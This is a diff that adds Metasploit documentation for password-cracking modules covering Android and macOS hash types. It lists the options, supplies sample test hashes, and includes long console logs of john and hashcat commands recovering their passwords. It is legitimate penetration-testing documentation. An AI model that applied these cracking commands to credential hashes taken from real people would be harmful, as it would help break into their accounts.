+ 1329   md5crypt     md5_pot_password   password          Already Cracked/POT
+ 1330   bsdicrypt    bsdi_password      password          Wordlist
+ 1331   sha256crypt  sha256_password    password          Wordlist
+ 1332   sha512crypt  sha512_password    password          Wordlist
+ 1333   bcrypt       blowfish_password  password          Wordlist
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public             private                                                                                             realm  private_type        JtR Format
+----  ------  -------  ------             -------                                                                                             -----  ------------        ----------
+                       md5_password       password                                                                                                   Password            
+                       blowfish_password  $2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe                                               Nonreplayable hash  bf
+                       des_pot_55         55                                                                                                         Password            
+                       des_password       password                                                                                                   Password            
+                       md52_password      $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                         Nonreplayable hash  md5
+                       sha256_password    password                                                                                                   Password            
+                       bsdi_password      _J9..K0AyUubDrfOgO4s                                                                                       Nonreplayable hash  bsdi
+                       sha512_password    $6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1         Nonreplayable hash  sha512
+                       bsdi_password      password                                                                                                   Password            
+                       sha512_password    password                                                                                                   Password            
+                       blowfish_password  password                                                                                                   Password            
+                       des2_password      rEK1ecacw.7.c                                                                                              Nonreplayable hash  des
+                       des_55             55                                                                                                         Password            
+                       des2_password      password                                                                                                   Password            
+                       md5_password       $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                         Nonreplayable hash  md5
+                       des_pot_55         fakeV6xlcXxRM                                                                                              Nonreplayable hash  des
+                       des_password       rEK1ecacw.7.c                                                                                              Nonreplayable hash  des
+                       md52_password      password                                                                                                   Password            
+                       md5_pot_password   password                                                                                                   Password            
+                       md5_pot_password   $1$O3JMY.Tw$AdLnLjQ/5jXF9.fakegHv/                                                                         Nonreplayable hash  md5
+                       des_passphrase     qiyh4XPJGsOZ2MEAyLkfWqeQ                                                                                   Nonreplayable hash  des
+                       des_55             rDpJV6xlcXxRM                                                                                              Nonreplayable hash  des
+                       sha256_password    $5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5                                                    Nonreplayable hash  sha256
+```

documentation/modules/auxiliary/analyze/crack_mobile.md

@@ -0,0 +1,266 @@
+## Vulnerable Application
+
+  This module attempts to use a password cracker to decode mobile (Android)
+  based password hashes, such as:
+
+  * `android-sha1` based passwords
+  * `android-samsung-sha1` based passwords
+  * `android-md5` based passwords
+
+  Formats:
+
+| Common               | John | Hashcat |
+|----------------------| -----|---------|
+| android-md5          | n/a  | 10      |
+| android-samsung-sha1 | n/a  | 5800    |
+| android-sha1         | n/a  | 110     |
+
+  Sources of hashes can be found here:
+  [source](https://hashcat.net/forum/thread-2202.html)
+
+## Verification Steps
+
+  1. Have at least one user with a `android-sha1`, `android-samsung-sha1`, or `android-md5` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/crack_mobile```
+  4. Do: set cracker of choice
+  5. Do: ```run```
+  6. You should hopefully crack a password.
+
+## Actions
+
+   **hashcat**
+
+   Use hashcat (default).
+
+## Options
+
+   **MD5**
+
+   Crack `android-md5` based passwords.  Default is `true`
+
+   **SHA1**
+
+   Crack `android-sha1` (non-samsung) based passwords.  Default is `true`
+
+   **SAMSUNG**
+
+   Crack `android-samsung-sha1` based passwords.  Default is `true`
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CRACKER_PATH**
+
+   The absolute path to the cracker executable.  Default behavior is to search `path`.
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **Fork**
+
+   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+
+   **INCREMENTAL**
+
+   Run the cracker in incremental mode.  Default is `true`
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **SHOWCOMMAND**
+
+   Show the command being used run from the command line for debugging.  Default is `false`
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+   **WORDLIST**
+
+   Run the cracker in dictionary/wordlist mode.  Default is `true`
+
+## Scenarios
+
+### Sample Data
+
+The following is data which can be used to test integration, including adding entries
+to a wordlist and pot file to test various aspects of the cracker.
+
+```
+creds add user:androidsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-sha1
+```
+
+### Hashcat
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+msf5 post(android/gather/hashdump) > creds add user:androidsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-sha1
+msf5 post(android/gather/hashdump) > previous
+msf5 auxiliary(analyze/crack_mobile) > set showcommand true
+showcommand => true
+msf5 auxiliary(analyze/crack_mobile) > run
+
+[+] hashcat Version Detected: v5.1.0
+[*] Hashes Written out to /tmp/hashes_tmp20191112-9775-19hbg7j
+[*] Wordlist file written out to /tmp/jtrtmp20191112-9775-f3q0r1
+[*] Checking android-sha1 hashes already cracked...
+[*] Cracking android-sha1 hashes in pin mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=UrEHXRVq --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --increment --increment-min=4 --increment-max=8 --attack-mode=3 --runtime=300 /tmp/hashes_tmp20191112-9775-19hbg7j ?d?d?d?d?d?d?d?d
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-sha1 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=UrEHXRVq --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --increment --increment-max=4 --attack-mode=3 /tmp/hashes_tmp20191112-9775-19hbg7j
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-sha1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=UrEHXRVq --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --attack-mode=0 /tmp/hashes_tmp20191112-9775-19hbg7j /tmp/jtrtmp20191112-9775-f3q0r1
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type     Username     Cracked Password  Method
+ -----  ---------     --------     ----------------  ------
+ 98     android-sha1  androidsha1  1234              Pin
+
+[*] Auxiliary module execution completed
+
+```
+
+### MD5, SHA1, SAMSUNG
+
+Create a password with each type, passwords are all `1234`.
+
+```
+msf5 > creds add user:samsungsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-samsung-sha1
+msf5 > creds add user:androidsha1 hash:9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5 jtr:android-sha1
+msf5 > creds add user:androidmd5 hash:1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5 jtr:android-md5
+```
+
+```
+msf5 > use auxiliary/analyze/crack_mobile
+msf5 auxiliary(analyze/crack_mobile) > run
+
+[+] hashcat Version Detected: v5.1.0
+[*] Hashes Written out to /tmp/hashes_tmp20191113-29506-1xydi7
+[*] Wordlist file written out to /tmp/jtrtmp20191113-29506-aq6ph7
+[*] Checking android-sha1 hashes already cracked...
+[*] Cracking android-sha1 hashes in pin mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=ishUl4hb --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=110 --increment --increment-min=4 --increment-max=8 --attack-mode=3 --runtime=300 /tmp/hashes_tmp20191113-29506-1xydi7 ?d?d?d?d?d?d?d?d
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-sha1 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=ishUl4hb --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=110 --increment --increment-max=4 --attack-mode=3 /tmp/hashes_tmp20191113-29506-1xydi7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-sha1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=ishUl4hb --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=110 --attack-mode=0 /tmp/hashes_tmp20191113-29506-1xydi7 /tmp/jtrtmp20191113-29506-aq6ph7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type     Username     Cracked Password  Method
+ -----  ---------     --------     ----------------  ------
+ 127    android-sha1  androidsha1  1234              Pin
+
+[*] Checking android-samsung-sha1 hashes already cracked...
+[*] Cracking android-samsung-sha1 hashes in pin mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=SMD3wSMl --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --increment --increment-min=4 --increment-max=8 --attack-mode=3 --runtime=300 /tmp/hashes_tmp20191113-29506-1xydi7 ?d?d?d?d?d?d?d?d
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-samsung-sha1 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=SMD3wSMl --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --increment --increment-max=4 --attack-mode=3 /tmp/hashes_tmp20191113-29506-1xydi7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-samsung-sha1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=SMD3wSMl --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --attack-mode=0 /tmp/hashes_tmp20191113-29506-1xydi7 /tmp/jtrtmp20191113-29506-aq6ph7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type             Username     Cracked Password  Method
+ -----  ---------             --------     ----------------  ------
+ 126    android-samsung-sha1  samsungsha1  1234              Pin
+ 127    android-sha1          androidsha1  1234              Pin
+
+[*] Checking android-md5 hashes already cracked...
+[*] Cracking android-md5 hashes in pin mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=outBsYDa --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=10 --increment --increment-min=4 --increment-max=8 --attack-mode=3 --runtime=300 /tmp/hashes_tmp20191113-29506-1xydi7 ?d?d?d?d?d?d?d?d
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-md5 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=outBsYDa --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=10 --increment --increment-max=4 --attack-mode=3 /tmp/hashes_tmp20191113-29506-1xydi7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-md5 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=outBsYDa --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=10 --attack-mode=0 /tmp/hashes_tmp20191113-29506-1xydi7 /tmp/jtrtmp20191113-29506-aq6ph7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type             Username     Cracked Password  Method
+ -----  ---------             --------     ----------------  ------
+ 126    android-samsung-sha1  samsungsha1  1234              Pin
+ 127    android-sha1          androidsha1  1234              Pin
+ 128    android-md5           androidmd5   1234              Pin
+
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/analyze/crack_osx.md

@@ -0,0 +1,395 @@
+## Vulnerable Application
+
+  This module attempts to use a password cracker to decode Mac OS X
+  based password hashes, such as:
+
+  * `XSHA` based passwords (10.4-10.6)
+  * `XSHA512` based passwords (10.7)
+  * `PBKDF2-HMAC-SHA512` based passwords (10.8+)
+
+| Common             | John               | Hashcat |
+|--------------------|--------------------|---------|
+| xsha               | xsha               | 122     |
+| xsha512            | xsha512            | 1722    |
+| pbkdf2-hmac-sha512 | pbkdf2-hmac-sha512 | 7100    |
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with an `xsha`, `xsha512`, `pbkdf2-hmac-sha512` password hash in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/crack_osx```
+  4. Do: set cracker of choice
+  5. Do: ```run```
+  6. You should hopefully crack a password.
+
+## Actions
+
+   **john**
+
+   Use john the ripper (default).
+
+   **hashcat**
+
+   Use hashcat.
+
+## Options
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CRACKER_PATH**
+
+   The absolute path to the cracker executable.  Default behavior is to search `path`.
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **Fork**
+
+   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+
+   **INCREMENTAL**
+
+   Run the cracker in incremental mode.  Default is `true`
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **PBKDF2-HMAC-SHA512**
+
+   Crack SHA12 hashes. Default is `true`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **SHOWCOMMAND**
+
+   Show the command being used run from the command line for debugging.  Default is `false`
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+   **WORDLIST**
+
+   Run the cracker in dictionary/wordlist mode.  Default is `true`
+
+   **XSHA**
+
+   Crack xsha based hashes. Default is `true`.
+
+## Scenarios
+
+### Sample Data
+
+The following is data which can be used to test integration, including adding entries
+to a wordlist and pot file to test various aspects of the cracker.
+
+```
+creds add user:buddahh hash:7E4F6138BE21EF6A61365A4D3270DAD24A6544EE188ED422 jtr:xsha
+creds add user:mama hash:3063D72395EB1A92D9BA9B8C2DF4074A081EDD1954E6B2BA jtr:xsha
+creds add user:hashcat hash:1430823483d07626ef8be3fda2ff056d0dfd818dbfe47683 jtr:xsha
+creds add user:hashcat hash:$ml$35460$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f9$
+echo "" > /root/.msf4/john.pot
+echo "3063D72395EB1A92D9BA9B8C2DF4074A081EDD1954E6B2BA:mama" >> /root/.msf4/john.pot
+echo "md5be86a79bf20fake2d58d5453c47d4860:password" >> /root/.msf4/john.pot
+echo "password" > /tmp/wordlist
+echo "buddahh" >> /tmp/wordlist
+```
+
+### John the Ripper
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_osx
+resource (hashes_hashcat.rb)> run
+[+] john Version Detected: 1.9.0-jumbo-1 OMP
+[*] Hashes Written out to /tmp/hashes_tmp20190531-30487-6zp8aw
+[*] Wordlist file written out to /tmp/jtrtmp20190531-30487-7w6deh
+[*] Checking xsha hashes already cracked...
+[*] Cracking xsha hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=u7NpglLW --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=xsha --wordlist=/tmp/jtrtmp20190531-30487-7w6deh --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+Warning: poor OpenMP scalability for this hash type, consider --fork=8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 16:03) 100.0g/s 819200p/s 819200c/s 819200C/s test3:::..Password1\!99
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking xsha hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=u7NpglLW --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=xsha --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+[*] Cracking xsha hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=u7NpglLW --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=xsha --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+[*] Cracking xsha hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=u7NpglLW --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=xsha --wordlist=/tmp/jtrtmp20190531-30487-7w6deh --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username      Cracked Password  Method
+ -----  ---------  --------      ----------------  ------
+ 1398   xsha       xsha_buddahh  buddahh           Single
+ 1399   xsha       xsha_mama     mama              Already Cracked/POT
+
+[*] Checking xsha512 hashes already cracked...
+[*] Cracking xsha512 hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=A5BIrZX9 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=xsha512 --wordlist=/tmp/jtrtmp20190531-30487-7w6deh --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+2g 0:00:00:00 DONE (2019-05-31 16:03) 66.66g/s 568866p/s 1137Kc/s 1137KC/s test3:::..t1900
+Use the "--show --format=xsha512" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking xsha512 hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=A5BIrZX9 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=xsha512 --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+[*] Cracking xsha512 hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=A5BIrZX9 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=xsha512 --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+[*] Cracking xsha512 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=A5BIrZX9 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=xsha512 --wordlist=/tmp/jtrtmp20190531-30487-7w6deh --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1398   xsha       xsha_buddahh      buddahh           Single
+ 1399   xsha       xsha_mama         mama              Already Cracked/POT
+ 1401   xsha512    xsha512_password  password          Single
+ 1402   xsha512    xsha512_hashcat   hashcat           Single
+
+[*] Checking PBKDF2-HMAC-SHA512 hashes already cracked...
+[*] Cracking PBKDF2-HMAC-SHA512 hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=BdToxfX9 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=PBKDF2-HMAC-SHA512 --wordlist=/tmp/jtrtmp20190531-30487-7w6deh --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 16:03) 9.090g/s 290.9p/s 290.9c/s 290.9C/s test3:::..Thales
+Use the "--show --format=PBKDF2-HMAC-SHA512" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking PBKDF2-HMAC-SHA512 hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=BdToxfX9 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=PBKDF2-HMAC-SHA512 --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+[*] Cracking PBKDF2-HMAC-SHA512 hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=BdToxfX9 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=PBKDF2-HMAC-SHA512 --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+[*] Cracking PBKDF2-HMAC-SHA512 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=BdToxfX9 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=PBKDF2-HMAC-SHA512 --wordlist=/tmp/jtrtmp20190531-30487-7w6deh --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type           Username          Cracked Password  Method
+ -----  ---------           --------          ----------------  ------
+ 1398   xsha                xsha_buddahh      buddahh           Single
+ 1399   xsha                xsha_mama         mama              Already Cracked/POT
+ 1401   xsha512             xsha512_password  password          Single
+ 1402   xsha512             xsha512_hashcat   hashcat           Single
+ 1403   PBKDF2-HMAC-SHA512  pbkdf2_hashcat    hashcat           Single
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public            private                                                                                                                                                                                                      realm  private_type        JtR Format
+----  ------  -------  ------            -------                                                                                                                                                                                                      -----  ------------        ----------
+                       xsha_buddahh      7E4F6138BE21EF6A61365A4D3270DAD24A6544EE188ED422                                                                                                                                                                    Nonreplayable hash  xsha
+                       xsha_mama         3063D72395EB1A92D9BA9B8C2DF4074A081EDD1954E6B2BA                                                                                                                                                                    Nonreplayable hash  xsha
+                       xsha_hashcat      1430823483d07626ef8be3fda2ff056d0dfd818dbfe47683                                                                                                                                                                    Nonreplayable hash  xsha
+                       xsha512_password  229499e73f6ff50fbd76fa1a0b11fe10964b51b57ee0bc7ca29a5fdccaf264e132eb682abeb40a3513a1fe26397ddcd1b5d0161e5e3ff308377994f4bed4172efcc25f8a                                                                            Nonreplayable hash  xsha512
+                       xsha512_hashcat   648742485c9b0acd786a233b2330197223118111b481abfa0ab8b3e8ede5f014fc7c523991c007db6882680b09962d16fd9c45568260531bdb34804a5e31c22b4cfeb32d                                                                            Nonreplayable hash  xsha512
+                       pbkdf2_hashcat    $ml$35460$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f96cbcb20a1ffb400718c20382030f637892f776627d34e021bad4f81b7de8222         Nonreplayable hash  PBKDF2-HMAC-SHA512
+                       xsha_mama         mama                                                                                                                                                                                                                Password            
+                       xsha_buddahh      buddahh                                                                                                                                                                                                             Password            
+                       xsha512_password  password                                                                                                                                                                                                            Password            
+                       xsha512_hashcat   hashcat                                                                                                                                                                                                             Password            
+                       pbkdf2_hashcat    hashcat                                                                                                                                                                                                             Password            
+
+[*] Starting persistent handler(s)...
+```
+
+### Hashcat
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_osx
+resource (hashes_hashcat.rb)> set action hashcat
+action => hashcat
+resource (hashes_hashcat.rb)> run
+[+] hashcat Version Detected: v5.1.0
+[*] Hashes Written out to /tmp/hashes_tmp20190531-31439-ulynqs
+[*] Wordlist file written out to /tmp/jtrtmp20190531-31439-1bcms0z
+[*] Checking xsha hashes already cracked...
+[*] Cracking xsha hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=YpmTr019 --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=122 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-31439-ulynqs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking xsha hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=YpmTr019 --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=122 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-31439-ulynqs /tmp/jtrtmp20190531-31439-1bcms0z
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username      Cracked Password  Method
+ -----  ---------  --------      ----------------  ------
+ 1421   xsha       xsha_buddahh  buddahh           Wordlist
+ 1422   xsha       xsha_mama     mama              Already Cracked/POT
+ 1423   xsha       xsha_hashcat  hashcat           Wordlist
+
+[*] Checking xsha512 hashes already cracked...
+[*] Cracking xsha512 hashes in incremental mode...
